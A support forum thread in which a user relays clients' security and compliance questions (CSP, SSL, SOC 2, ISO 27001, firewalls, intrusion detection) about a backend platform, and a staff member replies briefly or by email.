Security questions

Alessandra_Saviotti · February 8, 2022, 4:31pm

hello team,
can anyone help me address these questions:

Are ‘deep dive’ security scans possible to reveal intrusions, behavioral anomalies, and unknown threats to the website?
Are Content Security Policies (CSP) in place that can detect & mitigate types of attacks, i.e., XSS and data injections?
Are SSL certificates in place for encrypting Internet traffic and verifying your server identity?

I have received this from a potential client (University), and already explained we use Backlendless and have all the required policies and roles for access control in place

Thank you

mark-piller · February 8, 2022, 5:24pm

Hi Alessandra,

Please see below:

We have policies in place that would restrict anyone to get into our system outside of the ways and means provided by the platform and described in the documentation. We provide the security mechanisms for you to restrict access to your data by setting up a security policy for your app. If the security is not in place and someone accesses your application via API, we would not be able to detect that since it would be just a regular API call.

We have security policies in place and our system already stops attacks. However, if someone uses API to access data that you have not secured, it would appear as a regular API call.

Yes, all communication with our servers is encrypted and SSL certificates are in place.

Regards,
Mark

Alessandra_Saviotti · February 8, 2022, 5:32pm

thanks a lot Mark!

Alessandra_Saviotti · October 5, 2022, 4:18pm

hello @mark-piller, some more questions here from another client, if you could provide any additional information, thank you:

Have you undergone a SSAE 18 / SOC 2 audit?

Have you completed the Cloud Security Alliance (CSA) CAIQ?

Have you received the Cloud Security Alliance STAR certification?

Do you conform with a specific security standard framework (e.g. ISO 27001)?

is the system compliant with NIST SP 800-171?

Are you using a web application firewall (WAF)?

Are your systems scanned for vulnerabilities?

Any third party assessments?

Do you have a SOC 2 type 2 report available?

Does your organization have physical security controls and policies in place?

Do you have physical access control and video surveillance?

Do you enforce network segmentation between trusted and untrusted networks?

Are you utilizing a stateful packet inspection (SPI) firewall?

Do you use any IDS/IPS system to monitor for intrusions?

Are you employing next generation persistent threat (NGPT) monitoring?

Apologies for the many questions, and thank you in advance for any input you can provide

Alessandra

mark-piller · October 5, 2022, 9:37pm

I sent you an email with the answers.

Regards,
Mark

parley-burnett · November 17, 2023, 3:51pm

Hi @mark-piller , Can you also send me the same email? Specifically, looking for ISO 27001 and SOC 2.

mark-piller · November 17, 2023, 4:19pm

Done